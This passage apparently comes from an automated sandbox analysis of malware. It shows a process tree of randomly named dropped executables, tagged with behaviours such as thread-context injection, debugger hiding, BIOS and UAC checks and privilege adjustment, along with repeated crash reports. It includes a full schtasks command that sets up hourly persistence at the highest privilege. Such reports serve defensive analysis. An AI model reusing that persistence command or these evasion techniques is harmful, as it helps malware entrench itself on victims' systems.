- Executes dropped EXE
PID:4044

C:\Users\Admin\Documents\30KVL6nXUeMHDAbGiWz_82kI.exe
"C:\Users\Admin\Documents\30KVL6nXUeMHDAbGiWz_82kI.exe"
3⤵
PID:4720

C:\Users\Admin\Documents\9cLqEsI0vXIaeEh3T6RksIH_.exe
"C:\Users\Admin\Documents\9cLqEsI0vXIaeEh3T6RksIH_.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3148

C:\Users\Admin\Documents\9cLqEsI0vXIaeEh3T6RksIH_.exe
"C:\Users\Admin\Documents\9cLqEsI0vXIaeEh3T6RksIH_.exe"
3⤵
- Executes dropped EXE
PID:5788

C:\Users\Admin\Documents\iLzvlQbBihOlVLP7qToVz1b5.exe
"C:\Users\Admin\Documents\iLzvlQbBihOlVLP7qToVz1b5.exe"
2⤵
- Executes dropped EXE
PID:4036

C:\Users\Admin\Documents\IDqaKyGy46PBAbQsG8fyhkNY.exe
"C:\Users\Admin\Documents\IDqaKyGy46PBAbQsG8fyhkNY.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2604

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
"C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3984

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
- Executes dropped EXE
PID:4960

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
- Executes dropped EXE
PID:4484

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
- Executes dropped EXE
PID:5076

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
- Executes dropped EXE
PID:4376

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
- Executes dropped EXE
PID:424

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
- Executes dropped EXE
PID:5436

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:5864

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:5136

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
- Executes dropped EXE
PID:5752

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
- Executes dropped EXE
PID:5164

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
- Executes dropped EXE
PID:4924

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:5848

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:6036

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:4280

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:5484

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:6528

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:6920

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:6208

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:6284

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:4260

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:5028

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:7424

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:7800

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:7344

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:7680

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:7664

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:8032

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:8180

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:8508

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:9032

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:8656

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:8712

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:8864

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:9700

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:9436

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:10188

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:9992

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:2300

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:10000

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:8452

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:10252

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:10680

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:11168

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:10600

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:10468

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:10620

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:11340

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:11712

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:12236

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:11964

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:11972

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:7144

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:12340

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:12936

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:12584

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:13304

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:13140

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:12504

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:152

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:13404

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:13996

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:13348

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 888 -s 24
4⤵
- Program crash
PID:13636

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:14264

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:14332

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:14448

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:15052

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:14812

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:11524

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:15308

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:11928

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:15472

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:16128

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:15648

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:15444

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:15824

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:14036

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:14836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 14836 -s 24
4⤵
- Program crash
PID:8256

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:14980

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:1728

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:16704

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:16600

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:15584

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:16420

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:16632

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:14124

C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
C:\Users\Admin\Documents\SJwV3vwJv4GlOYIPyRJmFl0a.exe
3⤵
PID:16772

C:\Users\Admin\Documents\ZormC_xzlcw3eF39Dsw4gyRO.exe
"C:\Users\Admin\Documents\ZormC_xzlcw3eF39Dsw4gyRO.exe"
2⤵
- Executes dropped EXE
PID:1108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 748
3⤵
- Program crash
PID:7612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 776
3⤵
- Program crash
PID:7976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 728
3⤵
- Program crash
PID:7256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 816
3⤵
- Program crash
PID:4184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 952
3⤵
- Program crash
PID:7284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 980
3⤵
- Program crash
PID:7264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 1016
3⤵
- Program crash
PID:7616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 1404
3⤵
- Program crash
PID:9024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 1348
3⤵
- Program crash
PID:8768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 1684
3⤵
- Program crash
PID:8228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 1632
3⤵
- Program crash
PID:9512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 1608
3⤵
- Program crash
PID:9944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 1652
3⤵
- Program crash
PID:8520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 1716
3⤵
- Program crash
PID:8820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 1756
3⤵
- Program crash
PID:9336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 1496
3⤵
- Program crash
PID:10116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 1860
3⤵
- Program crash
PID:9612

C:\Users\Admin\Documents\hNXNBKN1amDNvT0pTwA9Jd5K.exe
"C:\Users\Admin\Documents\hNXNBKN1amDNvT0pTwA9Jd5K.exe"
2⤵
- Executes dropped EXE
PID:4028

C:\Users\Admin\Documents\wA1QzOOSwqJoESjFl9ItpcfI.exe
"C:\Users\Admin\Documents\wA1QzOOSwqJoESjFl9ItpcfI.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3840

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
3⤵
PID:5816

C:\Users\Admin\Documents\Et386eo4H7fyeQ96XtoQdW04.exe
"C:\Users\Admin\Documents\Et386eo4H7fyeQ96XtoQdW04.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:684

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
"C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2188

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
- Executes dropped EXE
PID:4916

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
- Executes dropped EXE
PID:2828

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
- Executes dropped EXE
PID:4656

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2816

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:204

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:5184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5184 -s 24
4⤵
- Program crash
PID:5524

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:6012

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:5712

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
- Executes dropped EXE
PID:5664

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
- Executes dropped EXE
PID:5468

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
- Executes dropped EXE
PID:1160

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
- Executes dropped EXE
PID:4956

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:1872

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:5524

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:5864

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:1416

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:6476

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:6816

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:5352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 24
4⤵
- Program crash
PID:6576

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:6448

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:7132

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:5700

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:7316

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:7704

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:8056

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:7596

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:4804

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:7788

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:5696

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:5720

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:8748

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:1116

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:8920

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:9148

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:9292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9292 -s 24
4⤵
- Program crash
PID:10080

